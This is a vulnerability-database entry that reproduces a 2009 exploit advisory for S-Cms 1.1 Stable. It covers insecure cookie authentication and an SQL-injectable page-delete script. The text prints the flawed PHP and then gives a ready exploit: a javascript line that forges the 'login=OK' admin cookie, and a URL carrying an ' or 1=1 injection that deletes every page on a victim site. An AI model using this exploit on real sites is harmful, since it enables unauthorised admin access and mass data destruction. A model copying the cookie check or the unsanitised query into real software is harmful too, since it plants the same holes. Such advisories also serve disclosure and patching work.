S-Cms 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulns

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052126 漏洞类型
发布时间 2009-03-13 更新时间 2009-03-13
CVE编号 CVE-2009-0863
CVE-2009-0864
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009030160
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#########################################################################################
[0x01] Informations:

Name           : S-Cms 1.1 Stable 
Download       : http://www.hotscripts.com/listings/jump/download/87992/
Vulnerability  : Insecure Cookie Handling / Mass Page Delete
Author         : x0r
Contact        : andry2000@hotmail.it
Notes          : Proud to be Italian 
#########################################################################################
[0x02] Bug:

Bugged file is /[path]/login_action.php ... /admin/delete_page.php

[Code]

$user=$_POST['username'];
$pass=$_POST['password'];

$select_admin = mysql_query("SELECT * FROM cms_admin");

while($dati_admin=mysql_fetch_array($select_admin)){
$username=$dati_admin['username'];
$password=$dati_admin['password'];
}

if ($user == $username && $pass == $password){
 
   setcookie("login", "OK", time() + $logintime); #0wn3d

[/code]

[CODE]
	
		$id=$_GET['id'];
		
		$delete=mysql_query("DELETE FROM cms_content WHERE id='$id'");
		
		
		if ($delete){
		
		echo ""._DELETE_PAGE_SUCCESS."";
		
		} else {
		
		echo ""._DELETE_PAGE_ERROR."";
[/code]

#########################################################################################
[0x03] Exploit:

Exploit: 1- javascript:document.cookie = "login=OK; path=/"
         2- http://[victim].org/path/admin/delete_page.php?id=' or 1=1/*

########################################################################################